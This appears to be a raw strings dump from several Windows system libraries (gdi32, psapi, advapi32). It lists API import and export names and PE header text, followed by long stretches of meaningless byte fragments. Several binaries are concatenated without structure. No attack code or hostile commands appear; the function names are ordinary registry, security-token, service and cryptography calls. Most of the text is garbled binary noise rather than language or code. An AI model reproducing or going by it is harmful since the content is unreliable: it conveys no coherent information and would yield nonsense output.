_wcsicmp RtlpEnsureBufferSize RtlNtPathNameToDosPathName RtlFreeUnicodeString RtlNtStatusToDosError _wcsnicmp _vsnwprintf NtQueryInformationFile NtCreateSection NtMapViewOfSection RtlDosPathNameToNtPathName_U RtlMultiByteToUnicodeN NtUnmapViewOfSection memset memmove RtlUnicodeToMultiByteN RtlUnicodeToMultiByteSize RtlInitializeCriticalSection RtlEncodePointer RtlDeleteCriticalSection RtlInitUnicodeString NtOpenKey NtQueryValueKey NtClose NtRequestWaitReplyPort RtlCopySid RtlLengthSid NtQueryInformationToken NtOpenProcessToken NtOpenThreadToken NtRegisterThreadTerminatePort NtSecureConnectPort NtQueryInformationProcess NtOpenFile RtlUnwind RtlAllocateHeap RtlFreeHeap memcpy RtlLeaveCriticalSection RtlEnterCriticalSection RegEnumValueW RegOpenKeyExW RegCloseKey GetSidSubAuthority GetSidSubAuthorityCount SetUnhandledExceptionFilter UnhandledExceptionFilter TerminateProcess GetSystemTimeAsFileTime GetCurrentThreadId QueryPerformanceCounter DisableThreadLibraryCalls ProcessIdToSessionId GetCurrentProcessId GetCurrentThread GetCurrentProcess SetFilePointerEx DeleteCriticalSection InitializeCriticalSection LeaveCriticalSection EnterCriticalSection GetLocalTime GlobalAlloc GlobalFree GetOEMCP FindResourceW SizeofResource LockResource LoadLibraryExW LoadLibraryA GetLocaleInfoW GetTickCount InterlockedCompareExchange CopyFileW SetFilePointer IsDBCSLeadByte CreateFileMappingW MapViewOfFile UnmapViewOfFile LocalReAlloc GetFileSizeEx VirtualUnlock GetSystemInfo GlobalLock GlobalUnlock GetTempPathW GetTempFileNameW DeleteFileW lstrlenW GetLastError lstrlenA SearchPathW GetFullPathNameW LoadLibraryW LoadResource SetLastError LocalFree LocalAlloc FreeLibrary GetProcAddress GetModuleHandleA GetACP MultiByteToWideChar WideCharToMultiByte IsDBCSLeadByteEx GetDriveTypeW GetWindowsDirectoryW CloseHandle WriteFile CreateFileW MulDiv GetSystemWindowsDirectoryW GlobalSize IntersectRect GetWindowRect IsThreadDesktopComposited CharUpperBuffA GetDC ReleaseDC GetAppCompatFlags UserRealizePalette GetAppCompatFlags2 InitializeLpkHooks CharLowerBuffW LpkGetTextExtentExPoint LpkUseGDIWidthCache LpkGetCharacterPlacement LpkExtTextOut LpkInitialize RSDS gdi32.pdb OPENGL32 FNOT !This program cannot be run in DOS mode. Rich .text `.data .rsrc @.reloc KERNEL32.dll nsww pwZapwr xwYbpw apw? xwA^swwcpw PSAPI.DLL EmptyWorkingSet EnumDeviceDrivers EnumPageFilesA EnumPageFilesW EnumProcessModules EnumProcessModulesEx EnumProcesses GetDeviceDriverBaseNameA GetDeviceDriverBaseNameW GetDeviceDriverFileNameA GetDeviceDriverFileNameW GetMappedFileNameA GetMappedFileNameW GetModuleBaseNameA GetModuleBaseNameW GetModuleFileNameExA GetModuleFileNameExW GetModuleInformation GetPerformanceInfo GetProcessImageFileNameA GetProcessImageFileNameW GetProcessMemoryInfo GetWsChanges GetWsChangesEx InitializeProcessForWsWatch QueryWorkingSet QueryWorkingSetEx KERNEL32.dll K32EnumProcesses K32EnumProcessModules K32EnumProcessModulesEx K32GetModuleBaseNameA K32GetModuleBaseNameW K32GetModuleFileNameExA K32GetModuleFileNameExW K32GetModuleInformation K32EmptyWorkingSet K32QueryWorkingSet K32QueryWorkingSetEx K32InitializeProcessForWsWatch K32GetWsChanges K32GetWsChangesEx K32GetMappedFileNameW K32GetMappedFileNameA K32EnumDeviceDrivers K32GetDeviceDriverBaseNameA K32GetDeviceDriverBaseNameW K32GetDeviceDriverFileNameA K32GetDeviceDriverFileNameW K32GetProcessMemoryInfo K32GetPerformanceInfo K32EnumPageFilesW K32EnumPageFilesA K32GetProcessImageFileNameA K32GetProcessImageFileNameW DisableThreadLibraryCalls QueryPerformanceCounter GetTickCount GetCurrentThreadId GetCurrentProcessId GetSystemTimeAsFileTime RSDSR psapi.pdb !This program cannot be run in DOS mode. B35c,`5c,`5c,`< `>c,`5c-` a,`< `.c,`< `4c,`< `'c,`< c,`< `4c,`< `4c,`Rich5c,` q!n\ .text `.data .rsrc @.reloc NpwT CswT wwQ"mwq wwYh @@f; @0Sj 4B%v3 =DA%v = vP u Wj t*9] _^[] @^_[ PPPPQP @0Qj 95PI%v TI%v vPSP u 9E @0Sj v_[^ %X@%v jXVS u$WWW vF;u j h` :jW[ PRPh PPPQ v_^] SVW3 @_^[] %P@%v %D@%v %@@%v D@%v P@%v @@%v 4@%v %4@%v QSVW3 jhVS vj X] C(VW 96u4 _^[] (B%vV (B%v; h D%v h D%v D%vS v_^[] u PW _^[] QPSPSj D%vS v_[] QQSVWh D%v h D%v v_^[ @0Vj D%vV j-[f9X .f9^ 4B%vH vh4B%v j$h@ f9\Q v_^[ I%vj PRPh PPPQ QRPh| lI%v QSVW3 QSVW3 ,N%v (N%v pM%v9u u 9M R%vtp R%vP u 9M 4B%v3 ;t 4B%v3 X vho h`q%v g%vh QRPh A%v % A%v $A%v %$A%v (A%v %(A%v ,A%v %,A%v 0A%v %0A%v CRYPTSP.dll WINTRUST.dll SspiCli.dll USER32.dll bcrypt.dll API-MS-Win-Security-LSALookup-L1-1-0.dll pcwum.dll CryptDecrypt CryptDeriveKey CryptDestroyHash CryptDestroyKey CryptDuplicateHash CryptDuplicateKey CryptEncrypt CryptEnumProviderTypesA CryptEnumProviderTypesW CryptEnumProvidersA CryptEnumProvidersW CryptExportKey CryptGenKey CryptGenRandom CryptGetDefaultProviderA CryptGetDefaultProviderW CryptGetHashParam CryptCreateHash CryptGetProvParam CryptGetUserKey CryptHashData CryptHashSessionKey CryptImportKey CryptReleaseContext CryptSetHashParam CryptSetKeyParam CryptSetProvParam CryptSetProviderA CryptSetProviderExA CryptSetProviderExW CryptSetProviderW CryptSignHashA CryptSignHashW CryptVerifySignatureA CryptVerifySignatureW CryptContextAddRef CryptAcquireContextW CryptGetKeyParam CryptAcquireContextA WinVerifyTrust LogonUserExExW GetUserNameExW GetUserNameExA SetProcessWindowStation GetUserObjectInformationW GetThreadDesktop CloseWindowStation GetWindowThreadProcessId GetSendMessageReceiver CloseDesktop GetProcessWindowStation BCryptGetProperty BCryptOpenAlgorithmProvider BCryptCreateHash BCryptHashData BCryptFinishHash BCryptDestroyHash BCryptCloseAlgorithmProvider LookupAccountNameLocalA LookupAccountNameLocalW LookupAccountSidLocalA LookupAccountSidLocalW PcwSendNotification PcwSendStatelessNotification PcwCreateNotifier PcwRemoveQueryItem PcwEnumerateInstances PcwAddQueryItem PcwCreateQuery PcwSetQueryItemUserData PcwCollectData RPCRT4.dll KERNEL32.dll API-MS-Win-Security-Base-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-NamedPipe-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll API-MS-WIN-Service-Management-L2-1-0.dll API-MS-WIN-Service-Management-L1-1-0.dll API-MS-WIN-Service-winsvc-L1-1-0.dll API-MS-WIN-Service-Core-L1-1-0.dll KERNELBASE.dll ntdll.dll msvcrt.dll iswctype _wcstoui64 _ftol2 tolower _ultow wcstok isalnum isspace _errno mbstowcs _except_handler4_common wcschr wcsrchr memset memmove _wcsicmp _vsnwprintf memcpy wcscpy_s _stricmp strchr strrchr strstr _vsnprintf wcstombs wcsstr swprintf_s wcsncpy_s wcsncmp swscanf_s _wcsnicmp wcstoul wcscat_s RtlRunOnceExecuteOnce LdrLoadDll LdrGetProcedureAddress RtlRunOnceBeginInitialize LdrUnloadDll NtOpenKey NtQueryValueKey NtOpenProcessToken NtQueryInformationToken NtClose RtlImageNtHeader EtwEventWriteEx RtlFreeAnsiString RtlGetCurrentTransaction DbgPrint RtlEnterCriticalSection RtlLeaveCriticalSection RtlIsTextUnicode RtlUnicodeStringToAnsiString RtlUnicodeToMultiByteSize RtlLengthSid RtlCopyUnicodeString RtlOemStringToUnicodeString RtlInitAnsiString RtlAnsiStringToUnicodeString RtlFreeUnicodeString RtlInitUnicodeString RtlDosPathNameToNtPathName_U RtlFreeHeap RtlAllocateHeap RtlNtStatusToDosError RtlDeleteCriticalSection RtlInitializeCriticalSection RtlCompareMemory RtlxUnicodeStringToAnsiSize NlsMbCodePageTag RtlMakeSelfRelativeSD RtlInitUnicodeStringEx RtlxAnsiStringToUnicodeSize NtSetInformationThread NtOpenThreadToken RtlRandom NtQuerySystemTime RtlGetNtProductType RtlGetThreadPreferredUILanguages RtlSubAuthoritySid RtlSubAuthorityCountSid RtlCopySid RtlUnicodeStringToInteger RtlConvertSidToUnicodeString RtlAllocateHandle RtlIsValidIndexHandle RtlFreeHandle RtlEqualSid NtSetInformationToken RtlAddAccessAllowedAceEx RtlFreeSid RtlAllocateAndInitializeSid NtCompareTokens NtDuplicateToken RtlSetOwnerSecurityDescriptor RtlCreateSecurityDescriptor RtlEnumerateGenericTableWithoutSplaying RtlIsGenericTableEmpty NtQueryInformationProcess NtQueryKey RtlGetLastNtStatus NtDeviceIoControlFile NtOpenFile RtlExpandEnvironmentStrings_U RtlDuplicateUnicodeString RtlCreateUnicodeString EtwEventWrite EtwEventRegister NtCreateKey NtSetValueKey RtlDeleteElementGenericTable NtDeleteKey RtlAppendUnicodeToString RtlInsertElementGenericTable RtlInitializeHandleTable EtwEventUnregister RtlDestroyHandleTable NtEnumerateKey RtlIntegerToUnicodeString RtlAppendUnicodeStringToString RtlStringFromGUID RtlFormatCurrentUserKeyPath RtlInitializeGenericTable RtlLookupElementGenericTable RtlQueryRegistryValues RtlNumberGenericTableElements RtlValidSid RtlGUIDFromString RtlUpcaseUnicodeChar NtQueryVolumeInformationFile RtlPrefixUnicodeString NtQuerySymbolicLinkObject NtOpenSymbolicLinkObject RtlDetermineDosPathNameType_U NtQueryInformationFile RtlGetFullPathName_U RtlNtStatusToDosErrorNoTeb RtlUnicodeToMultiByteN RtlMultiByteToUnicodeN RtlAnsiCharToUnicodeChar RtlDllShutdownInProgress NtCreateEvent NtTerminateThread NtWaitForSingleObject NtSetEvent NtClearEvent NtDelayExecution RtlExitUserThread RtlRegisterThreadWithCsrss NtCancelIoFile NtWaitForMultipleObjects NtDuplicateObject RtlReleaseRelativeName NtCreateFile RtlDosPathNameToRelativeNtPathName_U RtlSetLastWin32Error NtTraceControl EtwSendNotification EtwDeliverDataBlock EtwEnumerateProcessRegGuids NtSetSystemInformation RtlQueryTimeZoneInformation RtlQueryPerformanceFrequency EtwpGetCpuSpeed NtQuerySystemInformation NtQueryPerformanceCounter RtlInitializeBitMap RtlGetNativeSystemInformation RtlInterlockedClearBitRun RtlCreateAcl NtTraceEvent RtlQueryHeapInformation RtlDestroyQueryDebugBuffer RtlQueryProcessDebugInformation RtlCreateQueryDebugBuffer RtlAdjustPrivilege RtlImpersonateSelf EtwProcessPrivateLoggerRequest NtPowerInformation RtlIpv4AddressToStringW RtlIpv6AddressToStringW RtlInitAnsiStringEx RtlCompareUnicodeString RtlCreateUnicodeStringFromAsciiz NtRenameKey NtLoadKeyEx RtlInitializeSid RtlFirstFreeAce RtlValidAcl RtlAddAce RtlAddAuditAccessObjectAce RtlAddAccessDeniedObjectAce RtlAddAccessDeniedAceEx RtlAddAuditAccessAceEx RtlAddAccessAllowedObjectAce RtlGetControlSecurityDescriptor RtlGetSaclSecurityDescriptor RtlGetDaclSecurityDescriptor RtlGetGroupSecurityDescriptor RtlGetOwnerSecurityDescriptor RtlAbsoluteToSelfRelativeSD RtlSetSaclSecurityDescriptor RtlSetDaclSecurityDescriptor RtlSetGroupSecurityDescriptor RtlCopyString RtlTimeToSecondsSince1970 RtlReleaseSRWLockShared RtlAcquireSRWLockShared RtlReleaseSRWLockExclusive RtlAcquireSRWLockExclusive NtQueryInformationThread RtlInitializeSRWLock RtlEqualUnicodeString NtQueryObject NtQueryMutant NtAlpcQueryInformation RtlAddAccessAllowedAce NtCreateKeyTransacted RtlOpenCurrentUser NtOpenKeyTransacted NtQueryMultipleValueKey NtOpenKeyEx NtOpenKeyTransactedEx RtlValidRelativeSecurityDescriptor NtReplaceKey NtSaveKey NtSaveMergedKeys NtQuerySecurityObject EtwLogTraceEvent RtlDeleteElementGenericTableAvl RtlEnumerateGenericTableAvl RtlInsertElementGenericTableAvl RtlLookupElementGenericTableAvl RtlInitializeGenericTableAvl RtlGetVersion NtReadFile NtWriteFile RtlReAllocateHeap RtlLengthSecurityDescriptor RtlValidSecurityDescriptor EnumUILanguagesW GetUserDefaultUILanguage GetSystemDefaultUILanguage AreFileApisANSI RegisterServiceCtrlHandlerExW StartServiceCtrlDispatcherW SetServiceStatus I_ScRpcBindW StartServiceCtrlDispatcherA StartServiceA RegisterServiceCtrlHandlerW RegisterServiceCtrlHandlerExA RegisterServiceCtrlHandlerA QueryServiceStatus QueryServiceConfigA QueryServiceConfig2A OpenServiceA OpenSCManagerA NotifyServiceStatusChangeA CreateServiceA ControlServiceExA ControlService ChangeServiceConfigA ChangeServiceConfig2A I_ScRpcBindA ControlServiceExW OpenSCManagerW OpenServiceW CreateServiceW DeleteService CloseServiceHandle StartServiceW QueryServiceConfig2W NotifyServiceStatusChangeW ChangeServiceConfig2W ChangeServiceConfigW QueryServiceConfigW QueryServiceObjectSecurity QueryServiceStatusEx SetServiceObjectSecurity RegSaveKeyExW RegNotifyChangeKeyValue RegQueryInfoKeyA RegQueryInfoKeyW RegQueryValueExA RegLoadMUIStringA RegSaveKeyExA RegQueryValueExW RegGetKeySecurity RegSetKeySecurity RegRestoreKeyA RegRestoreKeyW RegSetValueExW RegLoadKeyA RegLoadKeyW RegOpenKeyExW RegDeleteKeyExA RegDeleteKeyExW RegDeleteValueA RegDeleteValueW RegEnumKeyExA RegEnumKeyExW RegEnumValueA RegEnumValueW RegGetValueA RegGetValueW RegCreateKeyExA RegCreateKeyExW RegFlushKey RegOpenCurrentUser RegOpenKeyExA RegDisablePredefinedCacheEx RegLoadMUIStringW RegOpenUserClassesRoot RegSetValueExA RegUnLoadKeyA RegUnLoadKeyW RegDeleteTreeW RegDeleteTreeA RegCloseKey ImpersonateNamedPipeClient CreateThread GetCurrentThread TerminateProcess GetCurrentProcess GetPriorityClass OpenThread GetCurrentThreadId SetThreadToken OpenThreadToken OpenProcessToken CreateProcessAsUserW GetCurrentProcessId GetProcessId GetSidLengthRequired GetSidSubAuthority GetSidSubAuthorityCount GetWindowsAccountDomainSid ImpersonateAnonymousToken ImpersonateLoggedOnUser ImpersonateSelf InitializeAcl InitializeSecurityDescriptor InitializeSid IsTokenRestricted IsValidAcl IsValidRelativeSecurityDescriptor IsValidSecurityDescriptor IsWellKnownSid MakeAbsoluteSD MakeAbsoluteSD2 GetSidIdentifierAuthority MapGenericMask PrivilegeCheck QuerySecurityAccessMask RevertToSelf SetAclInformation SetKernelObjectSecurity SetPrivateObjectSecurity SetPrivateObjectSecurityEx EqualDomainSid SetSecurityAccessMask SetSecurityDescriptorControl SetSecurityDescriptorDacl SetSecurityDescriptorGroup SetSecurityDescriptorOwner SetSecurityDescriptorRMControl SetSecurityDescriptorSacl SetTokenInformation GetSecurityDescriptorSacl GetSecurityDescriptorRMControl GetSecurityDescriptorOwner GetSecurityDescriptorLength GetSecurityDescriptorGroup GetSecurityDescriptorDacl GetSecurityDescriptorControl GetPrivateObjectSecurity GetLengthSid GetKernelObjectSecurity GetAclInformation GetAce FreeSid FindFirstFreeAce MakeSelfRelativeSD EqualSid IsValidSid AccessCheckAndAuditAlarmW AccessCheckByTypeAndAuditAlarmW AccessCheckByTypeResultListAndAuditAlarmW AccessCheckByTypeResultListAndAuditAlarmByHandleW ObjectOpenAuditAlarmW ObjectPrivilegeAuditAlarmW ObjectCloseAuditAlarmW ObjectDeleteAuditAlarmW PrivilegedServiceAuditAlarmW SetFileSecurityW GetFileSecurityW CopySid GetTokenInformation AccessCheck AccessCheckByType AccessCheckByTypeResultList AddAccessAllowedAce AddAccessAllowedAceEx AddAccessAllowedObjectAce AddAccessDeniedAce AddAccessDeniedAceEx AddAccessDeniedObjectAce AddAce AddAuditAccessAce AddAuditAccessAceEx AddAuditAccessObjectAce AdjustTokenGroups AdjustTokenPrivileges AllocateAndInitializeSid AllocateLocallyUniqueId AreAllAccessesGranted AreAnyAccessesGranted CheckTokenMembership ConvertToAutoInheritPrivateObjectSecurity CreatePrivateObjectSecurity CreatePrivateObjectSecurityEx CreatePrivateObjectSecurityWithMultipleInheritance CreateRestrictedToken CreateWellKnownSid DeleteAce DestroyPrivateObjectSecurity DuplicateToken DuplicateTokenEx EqualPrefixSid ReadFile VirtualAllocEx VirtualFree OpenProcess GlobalMemoryStatusEx GetActiveProcessorCount GetSystemInfo DeviceIoControl GetSystemWindowsDirectoryW GetVolumeInformationW GetDriveTypeW GetLogicalDriveStringsW ReleaseMutex HeapSize GetComputerNameW ExpandEnvironmentStringsA RegKrnInitialize GetModuleFileNameW LocalUnlock LocalLock GetComputerNameA SetEvent DuplicateHandle CreateMutexW ReadProcessMemory DecodePointer EncodePointer FreeLibraryAndExitThread IsWow64Process GetPrivateProfileIntW ResetEvent HeapReAlloc GetSystemTime CreateMutexA InitializeCriticalSection Wow64RevertWow64FsRedirection LockResource SizeofResource Wow64DisableWow64FsRedirection GetFileSize DosDateTimeToFileTime FileTimeToDosDateTime GetFileTime SetErrorMode FindNextFileW FindFirstFileExW SetFileInformationByHandle CopyFileW lstrcmpiA UnmapViewOfFile SetLastError LocalFree LocalAlloc LocalReAlloc WideCharToMultiByte lstrlenW MultiByteToWideChar GetComputerNameExW GetProcAddress LoadLibraryExA CloseHandle CreateProcessInternalA FreeLibrary GetLastError LoadLibraryExW LeaveCriticalSection EnterCriticalSection RegKrnGetGlobalState LoadLibraryA SleepEx GetTickCount HeapAlloc GetProcessHeap CreateFileW GetFullPathNameW HeapFree GetFileAttributesW SearchPathW DelayLoadFailureHook InterlockedCompareExchange QueryPerformanceCounter GetSystemTimeAsFileTime UnhandledExceptionFilter SetUnhandledExceptionFilter CreateEventW GetThreadUILanguage lstrcmpiW LoadLibraryW GetCommandLineW lstrcmpW Sleep GetModuleHandleExW WriteFile ExpandEnvironmentStringsW MoveFileW DeleteFileW GetFileAttributesExW SetFilePointer OutputDebugStringW GetLocalTime FormatMessageW GetModuleHandleW CreateFileMappingW GetFileSizeEx MapViewOfFile GetOverlappedResult CompareFileTime GetLongPathNameW LoadResource FindResourceExW GetVolumePathNameW DeleteCriticalSection WaitForSingleObject FindClose GetFileMUIPath InterlockedDecrement InterlockedIncrement InterlockedExchange VirtualFreeEx GetDiskFreeSpaceExW GetSystemDirectoryW GetFullPathNameA RpcBindingCreateW UuidCreate RpcBindingSetAuthInfoA RpcEpResolveBinding I_RpcSNCHOption UuidFromStringW UuidToStringW RpcExceptionFilter RpcBindingSetAuthInfoW RpcSsDestroyClientContext I_RpcMapWin32Status I_RpcExceptionFilter NdrClientCall2 RpcBindingSetAuthInfoExW RpcStringBindingComposeW RpcBindingFromStringBindingW RpcStringFreeW RpcBindingFree RpcBindingSetAuthInfoExA RpcRaiseException RpcBindingBind RSDSZtw advapi32.pdb [Y"vpY"v v-Z"vBZ"v vWZ"v vlZ"v vFY"v *^u[ \Z v _ v< B%v B%v(B%v(B%v @B%v `D%v `C%v D%v " v+A v DE%vDE%vDE%v a$ v+A v "vt "vP "v &H/>iOE1 #=H5 CRIM !D?8 #w[H V]s]Jx PY0J M +vH1,v) )vW1,vf1,v~1,v *v}.)v tRW3 |QW9] 0+vJ0+v 0+vf *+vi/+v 1+vY0+v /+vH /+vH +vv1+v /+vK/+v +vX1+v +v:1+vZ/+v 0+vw 0+vh0+v 0+v,0+v )+v*9+v :+v9q.v 1+vw0+v /+vY 1+v;0+v /+v9q.vY (+vw /+vx/+vH +vg1+v /+v-/+vH +vI1+v 0+v~8+v+1+vtQOtDOOt6OOuN9 H;)v S|RP t3f92t. j)vjj)v i)vVm)v i)vVm)v i)vbj)voj)v|j)vVm)vVm)v j)vVm)v j)vVm)v j)vVm)v 0v$0)v 0v$0)vi .vqH/v I/vyJ/v$K/v K/vzL/v%M/v M/v~N/v 0v,1)v E/v9E/vSE/vpE/v G/v9F/vSF/vmF/v 0v,1)v .v9q.v M0vvN0v K0v!L0v L0vi>-vBN0vML0v}L0v L0vc )&M> *v|0)v 2)v4,)vP,)vl,)v ,)vP L`0v (`0v 0h0v )b0v Xb0v 4b0v 1c0v `c0v @uO Win4u= 2v9F u!Wj( _^[] "2vWh 3vhP nv9=h nvtH9=l nvt@9=p nvt89=t nvt09=x nvt(; FVWP nv^9= )2vHP VjC3 P 2v nvuM nvuAC hH-2vHP 2v;E Vhp.2vh VVhp.2vh j8vW hp`4vP `l7v3 Phli8vj @i8v Vh0i8vP u=SVhL $1Rv TX5v W(RP Ph@J| V|Rh M SV g:vj 5vVj _w~ hh3:vV f9>u PGu. nv9] 2vWSj _^[] $ < QhPG@rAj@SV 2vSSj 4v$fSv 4v$fSv K5vO 5v80Vv 4v$fSv 4v$fSv,I]v d^vv9^vk/^v 5[v&M[v ^TSh PVjdS | 9u Vj.S 2vVVh VjcS FVh@ PVj^S g:vhl 2vVVj ChPh$87v ChPh %s/, 5vWh le9v _^[] s!Sj nv[] ^[H] ;vVP SVW3 h4$5vh _^[] 9vSj |6vP "2vV 2v9} Wh4c6v PhH,5vh 0i8vSj T6v(S6v U6vy Hc6v F0d89v F4D/5v F8Pd9v Hc6v F0d89v F4D/5v F8Pd9v _^[] hJuA <`6v L`6v _[vQ4JvD\jv 3vZP@v <5vS95v Uv'<5vj cvp46v;-6v cvB.3v h6vyg6v Tg6v $87v _^[] |vd^>v d4vv 4Q9v ~&VSW ;v_[] QSVW }'SP t'SP =|!2v 09vt $D8v ^@[] q\vA 6v {\v0s\v \^vA 6vsd^v 2[vA 6vb;[v 6vVP g:vW 6vSP 6vS&7v &7vX97v 97v4&7v QRPh0 +zUv 2v_^ 2evW2ev 2evafAv 1evYgIv )3vH SVWj P _^ P _^ Wt1j xV=v 8T=v QQh< >_^] 2v9= nvu 3 WWWW 2vWVh\ hH37v QRPh 2vj2 PPPPPhp 2vW3 }DWP 5D"2v 2vWV Sh2k7v QSW3 SVW3 f9;tG9= nvu? f9>u t'Vj2 PhH37vW R:vh /7v <$:v ,$:v kjO} 8P!u 8Q!u QRPh 7v F$ _^[] P hh(9v 6vSV 6vSV 6vSV 7vSV 7vSV ;vu48v M9N( h|Nt V *t P 2vPS PhPG Kv?v^vYv^v jc(= $x<8 sf"d v}z0 Q+BJ Q+BJ Vh@Jv ~kv="Fv ~kvo kv="Fv WWh( PPPP xsT3 F PWj F@WS 8AvI 7v~8Av WXvZXXvI mvU5>vF5>v tdv.tdv 9(fv (fvw2fvX3fv 8fv!)fvI .8vg@fv |Hj t'SW 7vSW HSVW3 +HFHv z8v Ht ;FX 5vriav7 Cvciav Fv'iav LvEiav FH40;v @@Nu =.cmd =.exe =.com =.bat 2vhP"9v hD"9v h8"9v h\"9v hh"9v hp`bBvS ^vPn@v= Bv`n@v G9v=CBv ?Bvk E8vel6v G9vE E8vel6v :9v2 E8vel6v :9vs E8vel6v E8vel6v :9vs{]v E8vel6v E8vel6v :9v^@@v E8vel6v E8vel6v E8vel6v E8vel6v E8vel6v :9v+ E8vel6v 7v..Wv /Wv0 G9vY$Wv {Wv'{WvK{Wv~{Wv {Wv%|WvJ|Wvp|Wv mv 8v G9v# Vv 8v I9vI q@vu I9vI I9vI G9vI G9vI I9vI q@vu I9vI I9vI G9vh'5vu bv;I]vI G9vqCav Fv=CBv \vG*Cv 'Jvv'Jv 'Jv` G9vI G9vk *\va *\vc G9v=CBv _DvI BevI G9v=CBv 7v=CBv ]vL#Dv=CBvI G9vI ?`v) I9vI I9vI G9vI XvI\8v^ -av) ^vPn@v G9v=CBv =vI2av Fv=CBv}>bv 8vUwJv q2v 8vV^6v ]jv1 Zjv~9gv G9v2 LvOy`v G9v=CBv w`v Lv?v`v x`v2r`v bvEpgv ?v\ 6v ZvyV5v G9v! G9vv :9v@ JvfwGv _^[] >5v5 G9v=CBv Bivy \`v+\`v Y`v6 R`vr LvOy`v G9v=CBv w`v Lv?v`v x`v2r`v*_`v ``v:U`v Gv-tJv Jv@\bv -lv D>v-D>vb-lv G9vC8>v 8v?L>v Jv}>bv hv=?>v MHve HvoVHv6 ^v0P\v 6vlP\v G9v` 8iv=7iv G9v=CBv NIvARIv G9vq NIvARIv ,?vb NIvARIv G9v7Okv Uvie4v G9v$ G9vN G9v' 6vZ}fv G9v:qfv -:@vR W?v6 ?@v&R?v P?vQ Fv=CBv G9v] Cv CDv CDv Av=CBv ]\vp]\v G9vciav G9vo\Fv G9v] ^ivR `iv6 ^vVRiv G9v~Eiv XivHZiv Eiv1?>v G9vy6>v 5>vC ZvA[Dv# dv] 8v hvUwJv z6v]y6v y6v Xv5O@v&O@v G9vU0Cv? G9vg&Cvo4Cv2 pIv9 dv-sIv pIv9 dv-sIv ZvE4_va Zv pIv9 dv-sIv! dv-sIv pIv9 dv-sIv 4_vE4_va Zv@5_v dv-sIv pIv9 dv-sIv G9v] G9v8 G9v) G9vR G9v, 0Kvg G9v9 G9vR Zv G9v% Zv 4_vp4_v G9vS [v$4_v 4_vp4_v G9v, _v=CBv G9vh'5vu dvY G9v2 8gv18gvWfgvC8gv~9gv G9vT G9vc hv8aFv kvzbkv ]v]6lv} 4lv3hlv2 G9vj >v75>v I9vKM`v G9v= _@^] I9v+ [v"9Gv 9GvF8Gv 2vj $ 2v I9vP 5vxJHv JvxJHv 5vip[v `BvN 5v3qavN jIvmjIv gIv#zcv GvT(Vv Vv#|\v Q9v]}\vi Zv} 9v Q9vq :GvM#Gv2$Gvs$Gv 4Gv- gGvI $Gv,`Yv >v|tGv >vRVYv `YvOaYv aYvBeYv /Kv0v]v /Kv! G9vc :Fvc 95vU Q9vk^jv G9vhYjv G9vY 6v-hGv Q9vl ivyhGv bFvLbFv|bFv MFv> gGvQEFv MFvn iv6&Av I[6v j6v{ _6v\M5v4 Jv%N5v `vE>6v Jv%#Kv ^v%#Kv :v%#Kv JviMFv /Kv~ /Kv= hv%#Kv /Kvt Q9v}wUv wUv1k[v$ Q9vf6Jv Hv*#Dvr ]v _>v Q9vm_>v (6vQ)6v<\fv )6vo iv_b9v Q9v8b9vt ~kv1 kv'skv Q9v- UvaH`v nJjvY48v Bv}Jjv @Qm6t Dv/igv 5v>igvT 5vy|hvT G9vI 7v u7v G9vU G9vI 7v u7v b7vU G9vI 7v u7v G9vU G9vI 7v u7v G9vU G9vI 7v u7v G9vU G9vI 7v u7v G9vU G9vI 7v u7v G9vU G9vI 7v u7v G9v_rgv 9v'pgv w6vI\8vtw6v ?vjd6v %\vCs5v v5vht5v ~9v,l5v \vkvGv &\vZ \vq7Jv |6v8 8VSP Vhh^9v X"2v h\^9vV PerUserInit $_9v 8_9v :vh^9v , ;v 2v_^ _^[] 2v+F P8_3 9s4t ^LW3 _^[] WWWh`e>vh *7vP u69E hp+7v hX+7v hD+7v h(+7v H 3M 1G U SV _^[] _^[] <"2v <"2vV G$j* SVW3 :vhd :vS +h\3 _^[] }'w] 02ev 2evW2ev 2evafAv 1evYgIv )3vH Y__^[ u 9u *|Qv>|Qv K|Qv_|Qv L}Qv`}Qvh"Zkvd nv1E VW9E nvSV @_^[] nvhd nvhh nvhm Klqt! nv_[ hG]:v hV]:v he]:v ht]:v hD^:v h,^:v ht^:v h\^:v h8]:v h1`:v hf`:v 2vWh :vWV :vSWV PVhc 2vj|V nvh8 nvhm n30' SVWj `":vS hh#:v qs-N S[bH ]/qNn O}N8 J9*`+ -:v$ $:v% $:vh-:v (%:vD-:v :v$-:v $:v<*:v $:vl$:v -:v( ,:v' x%:v ,:v; &:v$*:v `*:v X%:v ,:v) x$:v H%:v #:vL$:v $:vt,:v $:vd,:v %:vP,:v -:v<,:v ,:v# +:v- +:v. 8%:v +:v h%:v +:v! +:v" +:v* @vC /Hvj ]mvK1Kv EBvh Jvr}bvKkLvH 3Kv)3Kv EBvVkLv1FBv6kLv'^mv/]mvD]mv Hv2^mv Evn]mv LvG^mv\^mv=gbvq^mv ^mv,$Lv w:vIvbv gbv:wbvAjJvA Gv_jJvP lv8;lv w:vT w:vS-lv w:vC w:v5 G9v ;2vE w:vz vCvG E6v/ /cv<2cv ^vR8gv 8gvEfgv G9v4Ngv Ngv1 Gv_jJv8;lv Gv_jJv8;lv 1FvU:Fv^9Fv w:vQ ^vUwJv P6vY 5vY/5v Xvi~9v :vix:v eEv=$Ev% :vO Kv {:v g:vP uph| FHPD98 nvt)h 2v+E PVWWW 2vf9> WWWWh 2v+F _^[] K~:v VVWVh ;vVPV hH'Yv6 >YvhMYv MYv;NYvI 8vYTYv 8v}RYv tVHt Z>vVQ uhWVh u/j@ t WVh F`Ph g:vWh FXPh( H'=ue3 2vj/ /:vu :vh< tIj/ t0j/ 6Sh4L=v t)j/ t3W3 =v9] _^[] h"Zkvd nv1E WShH'=u` Qj`WS t1;vO FXPj @_^] 9Gxt_9 t[S9F Y Pav!Oav FvQH8v 8vHFHv z8v Uav*Pav 8v[_av( Pavciav QavyWav WavTXav Xav8Yav ZavkZav Zav)[av [avZ\av ]av'iav CYvX 8vvHYv HvuIYv DYvfIYv ;v6G6v9IYv HYv+HYvK:Yv HYv:HYv 9YvIHYv IYvHIYv ?Yv*IYv HYvXHYv CYvtDYv FvQH8vZI8vw\^v av'iav F`PS 2v_^ ;v\-;vL q;v. "3vZ~;ve};v -;vL q;v. Wv~};v };v. 9^(u 9^ 2vW3 tFSV QRRRRSh tevU uevm _vmU;v tevs uev} _vqS;v ;viB_v w:vI v ^UvM`Uv |Uv= ;v}]Iv |Uv=CBv (Wv= lWv$ Cv' Cv YvWYYv= ZYvY ;vUwJv'EBv= 